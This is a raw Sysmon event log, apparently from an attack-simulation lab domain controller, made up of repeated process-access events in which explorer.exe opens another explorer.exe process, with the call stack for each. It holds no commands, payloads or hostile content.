16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241254Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241253Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241252Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241251Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241250Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241249Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241248Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241247Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241246Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-6088-603E-A7A8-00000000AD01}11816C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241245Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241244Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241243Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241242Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241241Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241240Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241239Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241238Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241237Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241236Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241235Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241234Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241233Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241232Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241231Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6482|C:\Windows\System32\SHCORE.dll+617d|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241230Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6154|C:\Windows\System32\SHCORE.dll+5e3d|C:\Windows\System32\SHCORE.dll+5dcf|C:\Windows\System32\SHCORE.dll+5cd4|C:\Windows\System32\SHELL32.dll+a44a6|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241229Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a455f|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241228Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:54:29.654{05ADC7E1-59B2-603E-BEA7-00000000AD01}1618014068C:\Windows\explorer.exe{05ADC7E1-5F5C-603E-82A8-00000000AD01}11280C:\Windows\explorer.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+a44ca|C:\Windows\System32\SHELL32.dll+a5e58|C:\Windows\System32\SHELL32.dll+a2ac5|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\SHELL32.dll+a68ba|C:\Windows\System32\SHELL32.dll+6728a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002241227Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 